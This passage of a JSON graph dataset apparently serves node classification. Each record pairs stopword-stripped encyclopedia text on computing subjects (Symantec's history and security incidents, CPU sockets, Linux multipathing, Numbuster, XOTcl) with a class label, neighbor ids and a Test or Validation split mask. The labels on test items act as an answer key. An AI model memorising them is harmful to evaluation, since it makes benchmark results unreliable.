reason circuits often incorrectly referred delay-insensitive quasi delay-insensitive",
    "neighbors": [
      2339
    ],
    "mask": "Test"
  },
  {
    "node_id": 9569,
    "label": 4,
    "text": "Symantec:symantec symantec corporation commonly known symantec american software company headquartered mountain view california united states company provides cybersecurity software services symantec fortune 500 company member p 500 stock-market index company also development centers pune chennai bengaluru india october 9 2014 symantec declared would split two independent publicly traded companies end 2015 one company would focus security information management january 29 2016 symantec sold information-management subsidiary named veritas technologies symantec acquired 2004 carlyle group name symantec portmanteau words syntax semantics technology august 9 2019 broadcom announced would acquiring enterprise security software division symantec 10.7 billion dollars usd attempted purchase whole company founded 1982 gary hendrix national science foundation grant symantec originally focused artificial intelligence-related projects including database program hendrix hired several stanford university natural language processing researchers company first employees among barry greenstein professional poker player developer word processor component within q hendrix also hired jerry kaplan entrepreneur author consultant build in-ram database q 1984 became clear advanced natural language database system symantec developed could ported dec minicomputers pc left symantec without product expertise natural language database query systems technology result later 1984 symantec acquired another smaller software startup company c e software founded denis coleman gordon eubanks headed eubanks c e software developed combined file management word processing program called q question answer merged company retained name symantec eubanks became chairman vern raburn former president original symantec remained president combined company new symantec combined file management word processing functionality c e planned added advanced natural language query system designed gary hendrix engineered dan gordon set new standards ease database query report generation natural language system named intelligent assistant turner chose name q symantec flagship product large part name lent use short easily merchandised logo brett walter designed user interface q brett walter director product management q released november 1985 1986 vern raburn gordon eubanks swapped roles eubanks became ceo president symantec raburn became chairman subsequent change raburn little involvement symantec years time eubanks added chairmanship roles slow start sales q fall 1985 spring 1986 turner signed new advertising agency called elliott/dickens embarked aggressive new advertising campaign came six pack program symantec employees regardless role went road training selling dealer sales staff nationwide united states turner named six pack employees work six days week see six dealerships per day train six sales representatives per store stay friends free motel 6 simultaneously promotion run jointly sofsell symantec exclusive wholesale distributor united states first year q market promotion successful encouraging dealers try q time symantec advised jim lally john doerr — board members symantec stage — kleiner perkins caufield byers symantec would cut expenses grow revenues enough achieve cash flow break-even kpcb would back company raising venture capital accomplish management team worked salary reduction schedule chairman ceo would take zero pay vice presidents would take 50 pay cut employees pay cut 15 two employees laid eubanks also negotiated sizable rent reduction office space company leased days original symantec expense reductions combined strong international sales q enabled company attain break-even significantly increased traction q re-launch grew symantec revenues substantially along early success q international markets uniquely german version shipped three weeks united states version first software world supported german natural language following turner placed emphasis establishing international sales distribution multiple language versions q initial shipment 1985 rod turner negotiated publishing agreement david whitney symantec second product turner named noteit annotation utility lotus 1-2-3 evident turner noteit would confuse dealer channel launched symantec name symantec built interest stage q yet shipped low price utility would initially attractive dealer channel demand built turner felt product marketed unique brand name turner gordon e. eubanks jr. chairman symantec corporation agreed form new division symantec eubanks delegated choice name turner turner chose name turner hall publishing new division symantec devoted publishing third-party software hardware objective division diversify revenues accelerate growth symantec turner chose name turner hall publishing using last name dottie hall director marketing communications order convey sense stable long established company turner hall publishing first offering note-it notation utility add-in lotus 1-2-3 developed david whitney licensed symantec second product turner hall card 256k ram half slot memory card initially made inexpensively increase available memory symantec flagship product q turner hall division also marketed card standalone product turner hall third product also 1-2-3 add-in sqz lotus 1-2-3 spreadsheet compression utility developed chris graham synex systems summer 1986 eubanks turner recruited tom byers digital research expand turner hall publishing product family lead turner hall effort winter 1986–87 turner hall publishing division achieved success noteit turner hall card sqz popularity products contributing relatively small portion revenues symantec conveyed impression symantec already diversified company indeed many industry participants impression symantec acquired turner hall publishing 1987 byers recruited ted schlein turner hall product group assist building product family marketing revenues q symantec early launch international marketplace combined turner hall publishing generated market presence scale enabled symantec make first merger/acquisition february 1987 breakthrough software maker timeline project management software dos first time symantec acquired business revenues inventory customers eubanks chose change nothing breakthrough software six months actual merger logistics started summer 1987 turner appointed eubanks general manager timeline business unit turner made responsible successful integration company symantec ongoing growth business p l heavy emphasis placed making minimum disruption eubanks turner soon acquisition timeline/breakthrough software eubanks reorganized symantec structuring company around product-centric groups development quality assurance technical support product marketing functions general manager profit loss responsibility sales finance operations centralized functions shared structure lent well symantec growth mergers acquisitions eubanks made turner general manager new timeline product group simultaneously q product group made tom byers general manager turner hall product group turner continued build lead company international business marketing whole company timeline product group turner drove strong marketing promotion sales programs order accelerate momentum 1989 merger successful—product group morale high timeline development continued apace increased sales marketing efforts applied built timeline clear market lead pc project management software dos q timeline product groups healthily profitable profit stream merger success set stage subsequent merger acquisition activity company indeed funded losses product groups subsequently acquired 1989 eubanks hired john laing vp worldwide sales turner transferred international division laing eubanks also recruited bob dykes executive vice president operations finance anticipation upcoming ipo july 1989 symantec ipo may 1990 symantec announced intent merge acquire peter norton computing developer various utilities dos turner appointed product group manager norton business made responsible merger p l responsibility ted schlein made product group manager q business peter norton group merger logistical effort began immediately companies sought approval merger august 1990 symantec concluded purchase—by time combination companies already complete symantec consumer antivirus data management utilities still marketed norton name time merger symantec built upon turner hall publishing presence utility market introducing symantec antivirus macintosh sam symantec utilities macintosh sum two products already market leaders mac success made norton merger strategic symantec already begun development dos-based antivirus program one year merger norton management team decided enter antivirus market part felt antivirus market entailed great deal ongoing work stay ahead new viruses team felt microsoft would unlikely find effort attractive would lengthen viability market symantec turner decided use norton name obvious reasons became norton antivirus turner norton team launched 1991 time merger norton revenues approximately 20 25 combined entity 1993 led turner norton product group revenues grown approximately 82 symantec total one time symantec also known development tools particularly think pascal think c symantec c++ enterprise developer visual cafe packages popular macintosh ibm pc compatible platforms product lines resulted acquisitions made company late 1980s early 1990s businesses living videotext acquisition consistently unprofitable symantec losses diverted expenditures away q windows timeline windows development efforts critical period 1988 1992 symantec exited business late-1990s competitors metrowerks microsoft borland gained significant market share 1996 symantec corporation alleged misleading financial statements violation gaap 1999 april 2009 symantec led ceo john w. thompson former vp ibm time thompson african-american leading major us technology company succeeded april 2009 company long-time symantec executive enrique salem salem symantec completed acquisition verisign certificate authority business dramatically increasing share market salem abruptly fired 2012 disappointing earnings performance replaced steve bennett former ceo intuit ge executive january 2013 bennett announced major corporate reorganization goal reducing costs improving symantec product line said sales marketing high costs provide quality outcomes concluded system broken robert enderle cio.com reviewed reorganization noted bennett following general electric model product-focused instead customer-focused concluded eliminating middle management removes large number highly paid employees tactically improve symantec bottom line reduce skills needed ensure high-quality products long term march 2014 symantec fired steve bennett ceo position named michael brown interim president chief executive including interim ceo symantec 3 ceos less two years september 25 2014 symantec announced appointment michael brown president chief executive officer brown served company interim president chief executive officer since march 20 2014 mr. brown served member company board directors since july 2005 following acquisition veritas software corporation mr. brown served veritas board directors since 2003 july 2016 symantec introduced solution help carmarkers protect connected vehicles zero-day attacks symantec anomaly detection automotive iot solution manufacturers uses machine learning provide in-vehicle security analytics greg clark assumed position ceo august 2016 november 2016 symantec announced intent acquire identity theft protection company lifelock 2.3 billion august 2017 symantec announced agreed sell business unit verifies identity websites thoma bravo acquisition thoma bravo plans merge symantec business unit web certification company digicert january 4 2018 symantec bt formerly british telecom announced partnership provides new endpoint security protection may 2018 symantec initiated internal audit address concerns raised former employee causing delay annual earnings report august 2018 symantec announced hedge fund starboard value put forward five nominees stand election symantec board directors symantec 2018 annual meeting stockholders followed schedule 13d filing starboard showing accumulated 5.8 stake symantec september 2018 symantec announced three nominees starboard joining symantec board two immediate effect including starboard managing member peter feld one following 2018 annual meeting stockholders may 9 2019 symantec announced ceo greg clark businessman stepping immediate effect board member rick hill previously put forward starboard appointed interim president ceo vincent pilette also joined symantec new cfo august 9 2019 broadcom announced would acquiring enterprise software division symantec 10.7 billion dollars usd attempted purchase whole company norton family products remain symantec portfolio october 9 2014 symantec declared company would separate two independent publicly traded companies end 2015 symantec continue focus security new company established focusing information management symantec confirmed january 28 2015 information management business would called veritas technologies corporation marking return veritas name august 2015 symantec agreed sell veritas private equity group led carlyle group 8 billion sale completed february 2016 turned veritas privately owned company 2015 symantec norton product line includes norton security norton small business norton family norton mobile security norton online backup norton360 norton utilities norton computer tune 2012 pctools iantivirus rebranded norton product name iantivirus released mac app store also 2012 norton partner portal relaunched support sales consumers throughout emea technologies 1993 symantec acquired act contact software international symantec sold act saleslogix 1999 time world popular crm application windows macintosh december 16 2004 veritas software symantec announced plans merger veritas valued 13.5 billion largest software industry merger date symantec shareholders voted approve merger june 24 2005 deal closed successfully july 2 2005 july 5 2005 first day business u.s. offices new combined software company result merger symantec includes storage- availability-related products portfolio namely veritas file system vxfs veritas volume manager vxvm veritas volume replicator vvr veritas cluster server vcs netbackup nbu backup exec enterprise vault ev january 29 2016 symantec sold veritas technologies carlyle group august 16 2005 symantec acquired sygate security software firm based fremont california 200 staff november 30 2005 sygate personal firewall products discontinued january 29 2007 symantec announced plans acquire altiris april 6 2007 acquisition completed altiris specializes service-oriented management software allows organizations manage assets also provides software web services security systems management products established 1998 altiris headquartered lindon utah november 5 2007 symantec announced acquisition vontu leader data loss prevention dlp solutions 350 million january 17 2008 symantec announced spinning application performance management apm business i3 product line vector capital precise software solutions took development product management marketing sales apm business launching independent company september 17 2008 august 18 2008 symantec announced signing agreement acquire pc tools agreement pc tools would maintain separate operations financial terms acquisition disclosed may 2013 symantec announced discontinuing pc tools line internet security software december 2013 symantec announced discontinuing retiring entire pc tools brand offering non expiring license pc tools performance toolkit pc tools registry mechanic pc tools file recover pc tools privacy guardian users active subscription december 4 2013 april 18 2008 symantec completed acquisition appstream inc. “ appstream ” nonpublic palo alto california-based provider endpoint virtualization software appstream acquired complement symantec endpoint management virtualization portfolio strategy october 9 2008 symantec announced intent acquire gloucester-based messagelabs spun star internet 2007 boost software-as-a-service saas business symantec purchased online messaging web security provider 695 million cash acquisition closed november 17 2008 april 29 2010 symantec announced intent acquire pgp corporation guardianedge acquisitions closed june 4 2010 provided access established encryption key management technologies symantec customers may 19 2010 symantec signed definitive agreement acquire verisign authentication business unit included secure sockets layer ssl certificate public key infrastructure pki verisign trust verisign identity protection vip authentication services acquisition closed august 9 2010 august 2012 symantec completed rebranding verisign ssl certificate service renaming verisign trust seal norton secured seal acquired october 10 2010 rulespace web categorisation product first developed 1996 categorisation automated using symantec refers automated categorization system acs used base content filtering many uk isp may 19 2011 symantec announced acquisition clearwell systems approximately 390 million january 17 2012 symantec announced acquisition cloud email-archiving company liveoffice acquisition price 115 million last year symantec joined cloud storage backup sector enterprise vault.cloud cloud storage enterprise vault solutions addition cloud messaging solution symantec instant messaging security cloud ims.cloud symantec stated acquisition would add information governance products allowing customers store information on-premises symantec data centers march 2 2012 symantec completed acquisition odyssey software odyssey software main product athena device management software extended microsoft system center solutions adding ability manage support control mobile embedded devices smartphones ruggedized handhelds symantec completed acquisition nukona provider mobile application management mam april 2 2012 acquisition agreement symantec nukona announced march 20 2012 may 2014 symantec acquired nitrodesk provider touchdown market-leading third-party eas mobile application june 13 2016 announced symantec acquired blue coat 4.65 billion august 9 2004 company announced discovered error calculation deferred revenue represented accumulated adjustment 20 million arrival year 2010 triggered bug symantec endpoint symantec reported malware intrusion protection updates date greater december 31 2009 11:59pm considered 'out date company created distributed workaround issue march 2010 reported symantec antivirus symantec client security prone vulnerability might allow attacker bypass on-demand virus scanning permit malicious files escape detection january 2011 multiple vulnerabilities symantec products could exploited denial-of-service attack thereby compromise system reported products involved symantec antivirus corporate edition server symantec system center november 12 2012 vulnerability bulletin united states computer emergency readiness team us-cert reported following vulnerability older versions symantec antivirus system decomposer engine symantec endpoint protection sep 11.0 symantec endpoint protection small business edition 12.0 symantec antivirus corporate edition savce 10.x symantec scan engine sse 5.2.8 properly perform bounds checks contents cab archives allows remote attackers cause denial service application crash possibly execute arbitrary code via crafted file problem relates older versions systems patch available us-cert rated seriousness vulnerability 9.7 10-point scale decomposer engine component scanning system opens containers compressed files scanner evaluate files within january 2012 james gross filed lawsuit symantec distributing fake scareware scanners purportedly alerted users issues computers gross claimed scan errors problems corrected prompted scanner purchase symantec app remove rest gross claimed bought app speed computer remove detected viruses hired digital forensics expert back claim symantec denied allegations said would contest case symantec settled 11 million fund 9 1 million eligible customers representing overpaid amount app case dismissed court january 17 2012 symantec disclosed network hacked hacker known yama tough obtained source code symantec software hacking indian government server yama tough released parts code threatened release according chris paden symantec spokesman source code taken enterprise products five six years old september 25 2012 affiliate hacker group anonymous published source code norton utilities symantec confirmed part code stolen earlier leak included code 2006 versions norton utilities pcanywhere norton antivirus february 2012 reported verisign network data hacked repeatedly 2010 breaches disclosed publicly noted sec filing october 2011 verisign provide information whether breach included certificate authority business acquired symantec late 2010 oliver lavery director security research ncircle asked rhetorically trust site using verisign ssl certificates without clarity logical answer february 17 2012 details exploit pcanywhere posted exploit would allow attackers crash pcanywhere computers running windows symantec released hotfix issue twelve days later according mandiant symantec security products used new york times detected one 45 pieces malware installed chinese hackers newspaper network three-month period late 2012 symantec responded advanced attacks like ones new york times described following article http //nyti.ms/tztr5z underscore important companies countries consumers make sure using full capability security solutions advanced capabilities e ndpoint offerings including unique reputation-based technology behavior-based blocking specifically target sophisticated attacks turning signature-based anti-virus components e ndpoint solutions alone enough world changing daily attacks threats encourage customers aggressive deploying solutions offer combined approach security anti-virus software alone enough february 2015 symantec found guilty two counts patent infringement suit intellectual ventures inc ordered pay 17 million compensation damages september 2016 decision reversed appeal federal circuit september 18 2015 google notified symantec latter issued 23 test certificates five organizations including google opera without domain owners knowledge symantec performed another audit announced additional 164 test certificates mis-issued 76 domains 2,458 test certificates mis-issued domains never registered google requested symantec update public incident report proven analysis explaining details failures company asked report certificates issued certificate transparency log henceforth symantec since reported implementing certificate transparency ssl certificates google insisted symantec execute security audit third party maintain tamper-proof security audit logs march 24 2017 google stated lost confidence symantec latest incident improper certificate issuance google says millions existing symantec certificates become untrusted google chrome next 12 months according google symantec partners issued least 30,000 certificates questionable validity several years symantec disputes number google said symantec failed comply industry standards could provide audits showing necessary documentation google ryan sleevi said symantec partnered cas crosscert korea electronic certificate authority certisign certificatadora digital certsuperior s. de r. l. de c.v. certisur s.a. follow proper verification procedures leading misissuance certificates following discussions google required symantec migrate symantec-branded certificate issuance operations non-symantec-operated “ managed partner infrastructure ” deal announced whereby digicert acquired symantec website security business september 2017 google announced starting chrome 66 chrome remove trust symantec-issued certificates issued prior june 1 2016 google stated december 1 2017 symantec transition issuance operation publicly-trusted certificates digicert infrastructure certificates issued old symantec infrastructure date trusted chrome google predicted toward end october 2018 release chrome 70 browser would omit trust symantec old infrastructure certificates issued affecting certificates chaining symantec roots mozilla firefox planned distrust symantec-issued certificates firefox 63 released october 23 2018 delivered change firefox 64 released december 11 2018 apple also plan distrust symantec root certificates",
    "neighbors": [
      2049,
      2050,
      9217,
      6148,
      517,
      9221,
      6153,
      535,
      1052,
      5665,
      550,
      2601,
      6699,
      3116,
      3629,
      5165,
      7725,
      8752,
      10283,
      1592,
      10297,
      3643,
      9791,
      10303,
      9282,
      10308,
      4165,
      11333,
      10828,
      10831,
      4183,
      3161,
      5210,
      8283,
      1629,
      2654,
      9824,
      7780,
      9317,
      1638,
      4198,
      4710,
      8807,
      10348,
      111,
      2162,
      10872,
      5754,
      8827,
      9341,
      127,
      6785,
      1666,
      131,
      5764,
      1157,
      7809,
      9863,
      6282,
      3724,
      6797,
      7820,
      5777,
      10385,
      10903,
      10392,
      6297,
      156,
      8863,
      9375,
      161,
      2721,
      8865,
      10915,
      2213,
      9894,
      6823,
      3243,
      1708,
      3759,
      8368,
      7345,
      6834,
      9394,
      2749,
      704,
      7362,
      10950,
      10952,
      6345,
      202,
      8398,
      10448,
      9425,
      11476,
      8921,
      1242,
      1245,
      9439,
      5856,
      231,
      9449,
      10987,
      6382,
      10479,
      9460,
      3320,
      1273,
      3323,
      5371,
      9983,
      3843,
      5891,
      265,
      11021,
      9488,
      8978,
      7955,
      10003,
      2837,
      4374,
      2330,
      3867,
      5407,
      6431,
      11554,
      5924,
      1318,
      297,
      2859,
      10542,
      7473,
      4403,
      9523,
      2870,
      3382,
      11065,
      11577,
      11583,
      11584,
      9537,
      3395,
      4421,
      2378,
      1355,
      8524,
      10574,
      6993,
      8024,
      4441,
      2395,
      2907,
      1886,
      9055,
      5472,
      11622,
      3944,
      2409,
      4462,
      8046,
      4464,
      1907,
      3955,
      10613,
      1912,
      2425,
      8572,
      11646,
      9090,
      6019,
      7556,
      901,
      1925,
      11140,
      5512,
      1417,
      11142,
      7563,
      3981,
      10637,
      11152,
      11667,
      10132,
      11166,
      5028,
      8614,
      8615,
      1451,
      4013,
      1970,
      10166,
      7098,
      1979,
      7103,
      3520,
      8130,
      3525,
      4549,
      8135,
      4552,
      1994,
      6091,
      5069,
      9168,
      10708,
      2005,
      5078,
      8664,
      11225,
      8668,
      10208,
      2018,
      4081,
      6129,
      6643,
      6644,
      9713,
      5111,
      11256,
      10745,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 9570,
    "label": 3,
    "text": "Socket_4:socket 4 socket 4 presented 1993 first cpu socket designed early p5 pentium microprocessors socket 4 5-volt socket pentium socket 4 intel switched 3.3-volt-powered socket 5 socket 4 support special pentium overdrive allows running 120 mhz 60 mhz pentium 133 mhz 66 mhz pentium socket 4 replaced socket 5 1996",
    "neighbors": [
      5901,
      8851,
      4246,
      2455,
      3992,
      8855,
      11417,
      3995,
      4252,
      6175,
      7714,
      10019,
      4523,
      2604,
      2350,
      6192,
      9649,
      4537,
      2874,
      7105,
      4805,
      7110,
      8394,
      3403,
      4427,
      4179,
      3798,
      4185,
      7002,
      9945,
      11484,
      10468,
      613,
      8552,
      1260,
      4717,
      10225,
      371,
      9592,
      8442
    ],
    "mask": "None"
  },
  {
    "node_id": 9571,
    "label": 2,
    "text": "Linux_DM_Multipath:linux dm multipath dm-multipathing dm-mpio provides input-output i/o fail-over load-balancing using multipath i/o within linux block devices utilizing device-mapper multipathd daemon provides host-side logic use multiple paths redundant network provide continuous availability higher-bandwidth connectivity host server block-level device dm-mpio handles rerouting block i/o alternate path event path failure dm-mpio also balance i/o load across available paths typically utilized fibre channel fc iscsi san environments dm-mpio based device mapper provides basic framework maps one block device onto another utilizing linux dm-mpio datacenter operating systems multipath solutions key components path management must considered dm-mpio started patch set created joe thornber later maintained alasdair g kergon red hat included mainline linux kernel version 2.6.12 released june 17 2005 dm-mpio linux consists kernel components user-space components configuration file /etc/multipath.conf makes many dm-mpio features user-configurable multipath command kernel daemon multipathd use information found file file consulted configuration multipath devices changes must made prior running multipath command changes file afterwards require multipath executed multipath.conf five sections",
    "neighbors": [
      823,
      7983,
      7863,
      9882,
      10237
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9572,
    "label": 4,
    "text": "Numbuster:numbuster numbuster phone community users access via mobile phone client web application developed numbuster ltd allows users find contact details phone number exchange information numbers users block calls messages client available android windows phone numbuster developed numbuster ltd privately held company founded evgeny gnutikov ilya osipov others project launched moscow business school graduates android web site february 2014 september 2014 100 000 users russia cis first launched july–august 2014 numbuster accelerated biggest startup accelerator france numa paris service global telephone directory social call-blocking functionality allows users find name unknown caller whether ’ person business also rate comment thus adding value service helping users community get information apart users block phone number in-app im sms chat available september 2014 numbuster available 13 languages english russian arabic german french chinese italian portuguese spanish polish ukrainian japanese korean upon release numbuster gathered positive feedback russian bloggers media including publication leading news web-site",
    "neighbors": [
      10242,
      5251,
      5382,
      4746,
      1036,
      11408,
      3228,
      10271,
      3105,
      11170,
      10660,
      9511,
      1962,
      7983,
      9519,
      8758,
      1467,
      6208,
      1601,
      1218,
      2760,
      2892,
      8413,
      4318,
      3812,
      4068,
      6628,
      7928,
      10748
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9573,
    "label": 9,
    "text": "Cognitive_dimensions_of_notations:cognitive dimensions notations cognitive dimensions cognitive dimensions notations design principles notations user interfaces programming languages described researchers thomas r.g green marian petre dimensions used evaluate usability existing information artifact heuristics guide design new one cognitive dimensions designed provide lightweight approach analyse quality design rather in-depth detailed description provide common vocabulary discussing many factors notation ui programming language design also cognitive dimensions help exploring space possible designs design maneuvers changes intended improve design along one dimension thomas green originally defined 14 cognitive dimensions addition new dimensions sometimes proposed hci research field different levels adoption refinement candidate dimensions include creative ambiguity notation encourage interpreting several meanings element indexing elements guide finding specific part synopsis gestalt view whole annotated structure unevenness creation paths easier others bias expressed ideas developed artifact authors identify four main user activities interactive artifacts incrementation creation transcription modification exploratory design activity best served different trade-off usability dimension example high viscosity resistance change harmful modification exploration activities less severe one-off tasks performed transcription incrementation design maneuver change made designer notation design alter position within particular dimension dimensions created pairwise independent design altered one dimension keeping second one constant usually results trade-off dimensions modification increasing usability notation one dimension keeping second one constant typically reduce usability third dimension reflects assumption framework perfect interface trade-offs fundamental part usability design example design maneuver reducing viscosity notation adding abstraction mechanisms done incorporating style sheets abstraction represent common styling attributes items document notation item document defined individual style design maneuver made editor changes style sheet modify items eliminating repetition viscosity present need change style individual item",
    "neighbors": [
      2691,
      9573,
      8262,
      8430,
      8693
    ],
    "mask": "Test"
  },
  {
    "node_id": 9574,
    "label": 4,
    "text": "Personal,_Inc.:personal inc personal also referred personal.com personal inc. consumer personal data service identity management system individuals aggregate manage reuse data merged digi.me august 2017 business europe business model empowering people data combined company called digi.me one product lines collaborative data management information security solution workplace called teamdata spun new company result merger personal founded 2009 washington dc management team built map network location data mapping platform acquired nokia/navteq 2006 personal first online consumer-facing company named ambassador privacy design technical business legal commitments providing users control data store personal service called “ life management platform ” economist “ personal encrypted cloud service ” time user-centric approach data company associated infomediary model originated 1999 john hagel iii mark singer well vendor relationship management vrm model developed doc searls personal raised 30m funding develop platform products leading investors steve case ’ revolution ventures grotech ventures allen company ted leonsis neil ashe jonathan miller bill miller legg mason esther dyson edventures eric c. anderson company received recognition user agreement called owner data agreement acted like reverse license agreement data shared registered parties emphasized data ownership resides user doc searls wrote owner data agreement “ precedent modeled new legal position vendors intermediaries. ” personal early embrace “ small data ” defines “ big data benefit individuals. ” term “ small data ” may originally coined jeremie miller sing.ly mentioned talk web 2.0 summit november 2011 cited intention economy 2011 personal part first group companies join personal data ecosystem consortium startup circle small data meetup group also formed new york city bringing together technology legal business experts exchange ideas user-centric user-driven models internet products services personal included case studies ctrl-shift forrester regarding personal data stores personal identity management 2011 personal received innovator spotlight award privacy identity innovation conference pii2011 participated technology showcase pii2012 2012 techhive named personal one top five apps web services sxsw personal 2013 campus technology innovators award lone star college july 2013 personal included list executive travel magazine favorite travel apps 2013 may/june issue 2013 personal also included part nyu govlab open data 500 named j. walter thompson one 100 things watch 2014 2015 national law journal named company chief policy officer general counsel joshua p. galper one 50 cybersecurity privacy trailblazers personal platform privacy- security-by-design platform individuals manage reuse data information fill app 1-click form-filling solution web mobile logins checkouts forms data vault app served main cloud-based repository user data personal helped individuals take control benefit information knowing information data vault remained legally could used without permission personal spent two years building personal platform launching data vault product beta november 2011 following privacy design principles personal enabled users see share sensitive data files stored data vault information encrypted could decrypted user password users could choose know passwords vault personal store user passwords – therefore could reset without deleting user sensitive data files stored vault personal apps services linked user private data vault data vault featured automatic synchronization data files added device logged personal also featured “ secure share ” function created live private network allowing registered users share access data files exchange encrypted keys without risk transmitting data files non-secure direct means also allowed users immediately update data across network revoke access choose fast company called data vault “ tool simplify lives. ” personal launched android app november 30 2011 ios data vault app released may 7 2012 personal officially launched application programming interface apis october 2 2012 mashery business apis conference review cnet highlighted challenges getting people trust new service sensitive data spending time required entering enough data make useful data vault launched november 2011 mashable posed question “ never fill form ” world economic forum february 2013 report highlighted possibility saving 10 billion hours globally “ improv ing delivery public private sector services ” automated form-filling tools specifically citing personal fill app january 2013 personal launched fill beta web bookmarklet automatic form-filling june 11 2014 personal released fill web extension announced publishing index 140,000 1-click online forms www.fillit.com company also announced mobile version product launch later year according story tech cocktail launch personal “ web extension mobile app able support 1,200 different types reusable data even enabling unlock confidential information complete longer forms including patient registrations job applications event registrations school admissions insurance bank applications government forms. ” november 2014 mobile version fill launched could autofill mobile forms using apis personal form portal ultimately indexed 500,000 forms three components together allowed data captured reused across forms 1 form graph mapped individual form fields personal ontology 2 semantic layer determined data required form e.g one field vs. three fields u.s. telephone number 3 correlations graph helped individuals match specific data form without looking data value e.g knowing phone number mobile phone number address billing address person uses middle name first name forms initial public offering facebook may 2012 media interest question monetary value personal data whether tools services might emerge help consumers monetize data personal frequently cited company could potentially offer service articles pieces focusing subject appeared new york times adweek mit technology review cnn national public radio company co-founder ceo shane green quoted saying “ average american consumer would soon able realize 1,000 per year ” granting limited anonymous access data marketers figure never supported green company may 2016 personal shifted product focus teamdata focuses problem securing collaboratively managing data workplace onboardly included new collaborative teamdata solution list top 10 apps keep team track part top 50 list time best content marketing tools teamdata separate business",
    "neighbors": [
      8413,
      9063
    ],
    "mask": "Test"
  },
  {
    "node_id": 9575,
    "label": 9,
    "text": "XOTcl:xotcl xotcl object-oriented extension tool command language created gustaf neumann uwe zdun derivative mit otcl xotcl based dynamic object system metaclasses influenced clos class method definitions completely dynamic xotcl provides language support design patterns via filters decorator mixins",
    "neighbors": [
      9345,
      8262,
      6826,
      3183,
      5395,
      692,
      8628,
      3193,
      2556
    ],
    "mask": "Test"
  },
  {
    "node_id": 9576,
    "label": 4,
    "text": "Signature:signature signature sign handwritten often stylized depiction someone name nickname even simple x mark person writes documents proof identity intent writer signature signatory signer similar handwritten signature signature work describes work readily identifying creator signature may confused autograph chiefly artistic signature lead confusion people autograph signature people public eye keep signatures private whilst fully publishing autograph traditional function signature permanently affix document person ’ uniquely personal undeniable self-identification physical evidence person personal witness certification content specified part document example role signature many consumer contracts solely provide evidence identity contracting party also provide evidence deliberation informed consent many countries signatures may witnessed recorded presence notary public carry additional legal force legal documents illiterate signatory make mark often x occasionally personalized symbol long document countersigned literate witness countries illiterate people place thumbprint legal documents lieu written signature united states signatures encompass marks actions sorts indicative identity intent legal rule unless statute specifically prescribes particular method making signature may made number ways include mechanical rubber stamp facsimile signature may made purported signatory alternatively someone else duly authorized signatory acting signer presence signatory direction may make signature many individuals much fanciful signatures normal cursive writing including elaborate ascenders descenders exotic flourishes much one would find calligraphic writing example final k john hancock famous signature us declaration independence loops back underline name kind flourish also known paraph paraphe term meaning flourish initial signature french paraph used graphology analyses several cultures whose languages use writing systems alphabets share western notion signatures per se signing one name results written product different result writing one name standard way languages write sign involves written characters also see calligraphy special signature machines called autopens capable automatically reproducing individual signature typically used people required sign lot printed matter celebrities heads state ceos recently members congress united states begun signature made truetype font file allows staff members congressman office easily reproduce correspondence legislation official documents east asian languages chinese japanese korean people traditionally use stamp-like objects known name-seals name carved tensho script seal script lieu handwritten signature government agencies require professional persons official reviewers sign originals copies originals authenticate personally viewed content united states prevalent architectural construction plans intent prevent mistakes fraud practice known effective e-mail newsgroup usage another type signature exists independent one language users set one lines custom text known signature block automatically appended messages text usually includes name contact information sometimes quotations ascii art shortened form signature block including one name often distinguishing prefix used simply indicate end post response web sites also allow graphics used note however type signature related electronic signatures digital signatures technical nature directly understandable humans wikipedia online wiki-based encyclopedia edited volunteers contributors sign comments talk pages username username holder right digitally affix signature signature painting work art always important item assessment art fake signatures sometimes added enhance value painting added fake painting support authenticity notorious case signature johannes vermeer fake supper emmaus made art-forger han van meegeren however fact painters signatures often vary time particularly modern contemporary periods might complicate issue signatures painters take artistic form may less value determining forgeries term signature also used mean characteristics give object piece information identity—for example shape coca-cola bottle rock music heavy metal music electric guitarists develop unique tone sound using particular settings guitar amp effects units modifications guitar pickups called signature sound wrestling wwe wrestlers known distinctive signature finishing moves golf courses signature hole aesthetically pleasing photogenic hole makes particular course unique analogy word signature may used refer characteristic expression process thing example climate phenomenon known enso el niño characteristic modes different ocean basins often referred signature icie collier signatory indicates party agreement especially international treaty convention e.g brazil signatory convention biological diversity british law appearance signatures names may protected copyright law united states copyright law titles names c ... mere variations typographic ornamentation lettering coloring eligible copyright however appearance signatures names may protected copyright law uniform commercial code §1-201 37 united states generally defines signed using symbol executed adopted present intention adopt accept writing uniform commercial code §3-401 b negotiable instruments states signature may made manually means device machine ii use name including trade assumed name word mark symbol executed adopted person present intention authenticate writing",
    "neighbors": [
      7075,
      7429,
      4935,
      298,
      5674,
      9164,
      5200,
      2936,
      1557,
      7124,
      9334,
      1496,
      5433,
      10207,
      1821,
      3231
    ],
    "mask": "Test"
  },
  {
    "node_id": 9577,
    "label": 0,
    "text": "American_National_Corpus:american national corpus american national corpus anc text corpus american english containing 22 million words written spoken data produced since 1990 currently anc includes range genres including emerging genres email tweets web data included earlier corpora british national corpus annotated part speech lemma shallow parse named entities anc available linguistic data consortium fifteen million word subset corpus called open american national corpus oanc freely available restrictions use anc website corpus annotations provided according specifications iso/tc 37 sc4 linguistic annotation framework using freely provided transduction tool anc2go corpus user-chosen annotations provided multiple formats including conll iob format xml format conformant xml corpus encoding standard xces usable british national corpus xaira search engine uima-compliant format formats suitable input wide variety concordance software plugins import annotations general architecture text engineering gate also available anc differs corpora english richly annotated including different part speech annotations penn tags claws5 claws7 tags shallow parse annotations annotations several types named entities additional annotations added parts corpus become available often contributions projects unlike on-line searchable corpora due copyright restrictions allow access individual sentences entire anc available enable research involving example development statistical language models full-text linguistic annotation anc annotations automatically produced unvalidated 500,000 word subset called manually annotated sub-corpus masc annotated approximately 20 different kinds linguistic annotations hand-validated manually produced include penn treebank syntactic annotation wordnet sense annotation framenet semantic frame annotations among others like oanc masc freely available use downloaded anc site linguistic data consortium also distributed part-of-speech tagged form natural language toolkit anc sub-corpora differ similar corpora primarily range linguistic annotations provided inclusion modern genres appear resources like british national corpus also initial target use corpora development statistical language models full data annotations available thus differing corpus contemporary american english coca available selectively web browser continued growth oanc masc relies contributions data annotations computational linguistics corpus linguistics communities proceedings 48th annual meeting association computational linguistics uppsala sweden",
    "neighbors": [
      416,
      5667,
      8323,
      5639,
      3721,
      4971,
      5903,
      7599,
      10160,
      5778,
      3127,
      6174,
      5214
    ],
    "mask": "None"
  },
  {
    "node_id": 9578,
    "label": 9,
